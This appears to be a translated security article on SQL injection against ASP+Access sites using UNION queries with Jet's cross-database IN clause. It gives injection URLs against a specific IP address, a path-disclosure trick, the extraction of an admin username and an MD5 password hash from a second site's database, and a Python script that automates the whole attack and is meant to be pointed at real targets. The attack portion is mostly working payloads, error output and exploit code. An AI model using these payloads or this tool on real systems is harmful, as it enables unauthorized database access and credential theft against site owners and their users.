Cross-database query of Access (figure)

Source: Internet
Author: User
Tags: mysql, injection, perl, script

You may remember MSSQL's cross-database query. Queries across two databases can in fact also be done in Access, and that is what this article introduces.
First, let's look at how to query an .mdb file from within Access. Create an empty database and, from it, query the contents of the admin table in the database D:\daos\db\daidalos.mdb. The SQL statement is:
[figure: the SQL statement, as entered in the empty Access database]
After running it, Access returns the contents of the admin table of the target database:
[figure: query result showing the rows of the admin table]
In real ASP injection the same request has to carry two SELECT statements at once. Anyone familiar with PHP+MySQL injection will immediately think of UNION queries, and they work in Access too. A further advantage of UNION is that we no longer have to guess the data one character at a time: as in MySQL+PHP injection, the contents of a field are displayed directly in the page (mix has already written a detailed article on that). From the above, a cross-database query needs two conditions:
1. When using UNION, the number of columns in the page's own SELECT statement must be known.
2. The location of the target database, its absolute path on disk, must be known.
Condition 1 can be guessed manually from the error messages, or automated with a script.
Condition 2 is harder, but the Access database-path disclosure trick (forcing a Jet error that prints the path, shown below) takes care of it. Some will ask: if we can learn where the database is, why not simply download it? Because nowadays databases are generally protected against download, and some are not under the web directory at all.
The first level of the lab's fourth round consists of two ASP+Access download systems: the Rain Point download system (yddown) and the Stolen Handsome download system (dsdown). Testing shows that the Stolen Handsome system leaks its database path but does not let the database be downloaded, and no injection point is apparent. The Rain Point system, on the other hand, is full of holes: its database path can be exposed, the file can be downloaded directly, and it is injectable as well. Its admin panel, however, is very simple and offers nothing useful. Our goal is the admin password of the Stolen Handsome system, so I will show how to obtain it through a cross-database query from the Rain Point injection point:
We know that list.asp of the Rain Point system is injectable. First we need the number of columns for the UNION; submit:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo

Returned:
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/yddown/list.asp, line 51

The column count is wrong. I wrote a Perl script to guess the column count automatically (see the code below). When we submit:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo

no error is returned:
[figure: list.asp rendering normally with the UNIONed row]
Haha! We have the column count, and whatever we put in position 1 of the SELECT list is displayed in the page.
Now we still need the location of the Stolen Handsome system's database. Simply submit:
http://219.237.81.46/dsdown%5cregs.asp

The path comes back in the error:
Microsoft JET Database Engine error '80004005'
'D:\111\db\kljdsld.asa' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.
/dsdown/db/user.asp, line 6

(Note: the disclosed path is not necessarily complete. The actual path is D:\111\dsdown\db\kljdsld.asa.)
Next we construct the cross-database URL:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

This statement UNIONs in the admin column of the row with id=1 from the admin table of D:\111\dsdown\db\kljdsld.asa. If it succeeds, the admin username is displayed directly in the page:
[figure: list.asp showing the value of the admin column]
The username is admin. Now dump the password the same way, selecting the pws column:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

[figure: list.asp showing the value of the pws column]
We get a 32-character MD5 hash: 77e6cbb3f9468eadb655ae6826357922. The cross-database query has succeeded. I only wanted to demonstrate the cross-database query here; the site's protection does nothing against it :).
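As an added example (not the author's Perl script, and not code from either download system), the following Python automates the procedure above end to end: it guesses the column count of list.asp from the Jet 80040e14 error, builds the %5c path-disclosure URL, and assembles the cross-database UNION payload using Jet's `FROM table IN "path"` clause. The host, paths, table and column names are the ones quoted in this article; the HTTP side is a `probe(url)` callable, and `FakeListAsp` is a constructed stand-in for list.asp (three columns, first column echoed) so the module runs offline. It pads the unused positions as `2,3` rather than the article's `3,2`; the order of the constants does not matter, only the count and which position carries the target column.

```python
"""Added example: automating Access cross-database UNION injection.

Condition 1 (column count) is found by watching for the Jet union-mismatch
error; condition 2 (database path) is provoked with the %5c trick. HTTP is
abstracted as probe(url) -> page text so everything runs offline against
FakeListAsp, a constructed simulation of the article's /yddown/list.asp.
"""
from urllib.parse import quote, unquote

BASE = "http://219.237.81.46"                 # host from the article
LIST_ASP = BASE + "/yddown/list.asp?id="      # injectable parameter
JET_UNION_MISMATCH = (
    "Microsoft JET Database Engine error '80040e14'\n"
    "The number of columns in the two selected tables or queries of a union "
    "query do not match.\n/yddown/list.asp, line 51"
)


def union_probe_url(param_value, ncols, table):
    """UNION `ncols` constant columns onto the page's own SELECT. The
    constants 1..ncols double as markers: the one that shows up in the page
    is the rendered position (position 1 in the article's case)."""
    cols = ",".join(str(i) for i in range(1, ncols + 1))
    return LIST_ASP + quote(f"{param_value} union select {cols} from {table}", safe=",")


def guess_column_count(probe, param_value, table, max_cols=50):
    """Condition 1: raise the column count until Jet stops reporting the
    union mismatch. Any other Jet error (unknown table, syntax) will not go
    away by adding columns, so stop and return None instead of looping."""
    for n in range(1, max_cols + 1):
        page = probe(union_probe_url(param_value, n, table))
        if "80040e14" in page:
            continue
        if "Microsoft JET Database Engine error" in page:
            return None
        return n
    return None


def path_disclosure_url(appdir, script):
    """Condition 2: the %5c trick. A literal backslash in the virtual path
    breaks the include-relative database path, and Jet's 'is not a valid
    path' error prints the path it tried. As the article notes, the printed
    path may be missing a directory (D:\\111\\db\\... vs D:\\111\\dsdown\\db\\...)."""
    return f"{BASE}/{appdir}%5c{script}"


def cross_db_sql(column, table, db_path, ncols, show_pos=1, where="id=1"):
    """The injected tail: read `column` from `table` inside the external Jet
    database `db_path`, placed at the rendered position; pad the rest."""
    if not 1 <= show_pos <= ncols:
        raise ValueError("show_pos must lie in 1..ncols")
    items = [column if i == show_pos else str(i) for i in range(1, ncols + 1)]
    return f'union select {",".join(items)} from {table} in "{db_path}" where {where}'


def cross_db_url(param_value, column, table, db_path, ncols, show_pos=1, where="id=1"):
    """Full URL; quotes and backslashes are left raw, as in the article
    (percent-encoding them works equally well, ASP decodes either way)."""
    sql = f"{param_value} {cross_db_sql(column, table, db_path, ncols, show_pos, where)}"
    return LIST_ASP + quote(sql, safe=',=:"\\')


class FakeListAsp:
    """Constructed simulation of /yddown/list.asp: its own SELECT has three
    columns and the first column of each row is echoed into the HTML."""
    NCOLS = 3
    TABLES = {"userinfo"}

    def __init__(self):
        self.requests = []

    def __call__(self, url):
        self.requests.append(url)
        sql = unquote(url.split("?id=", 1)[1])
        _, tail = sql.split(" union select ", 1)
        select_list, rest = tail.split(" from ", 1)
        table = rest.split(" ", 1)[0]
        if table not in self.TABLES:
            # constructed placeholder for a different Jet error (unknown table)
            return "Microsoft JET Database Engine error 'xxxxxxxx'\n(unknown table)"
        items = select_list.split(",")
        if len(items) != self.NCOLS:
            return JET_UNION_MISMATCH
        return f"<html><body><td>{items[0]}</td></body></html>"


if __name__ == "__main__":
    target = FakeListAsp()
    n = guess_column_count(target, "75", "userinfo")
    print("column count:", n)
    print("path disclosure:", path_disclosure_url("dsdown", "regs.asp"))
    db = r"D:\111\dsdown\db\kljdsld.asa"
    for col in ("admin", "pws"):
        print(cross_db_url("75", col, "admin", db, n))
```

With a real target, replace `FakeListAsp` with a function that fetches the URL and returns the response body; everything else stays the same. The stop-on-other-error rule in `guess_column_count` matters in practice: if the table name in the probe is wrong, Jet raises a different error for every column count and a naive loop would run to `max_cols` and report nothing useful.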
Summary
This article introduced two very useful techniques. First, in ASP injection we no longer have to guess the data one character at a time, which is painful when it contains Chinese characters; using UNION to bring the data into the page exposes it directly, Chinese and special characters included, in one step. Second, the cross-database query is very flexible and can give you unexpected gains during a penetration test.
